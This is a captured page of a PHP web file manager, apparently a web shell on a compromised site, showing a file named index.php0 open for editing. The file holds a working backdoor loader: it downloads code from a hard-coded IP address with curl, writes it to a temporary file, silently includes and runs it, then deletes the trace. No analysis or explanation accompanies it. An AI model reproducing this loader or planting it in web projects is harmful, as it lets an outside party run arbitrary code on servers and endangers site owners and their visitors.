📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-07-06 17:01:00
📂
/ (Root)
/
home
/
jisrilmk
/
shiro-trade.com
📍 /home/jisrilmk/shiro-trade.com
🔄 Refresh
✏️
Editing: index.php0
Writable
<?php $f = @tempnam(@sys_get_temp_dir(),""); $handle = curl_init(); curl_setopt ($handle, CURLOPT_URL, 'http://63.141.224.2/z60630_o/stat/index.txt'); curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5); $result = curl_exec( $handle ); if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } @file_put_contents($f, $result); @include $f; @unlink($f);
💾 Save Changes
❌ Cancel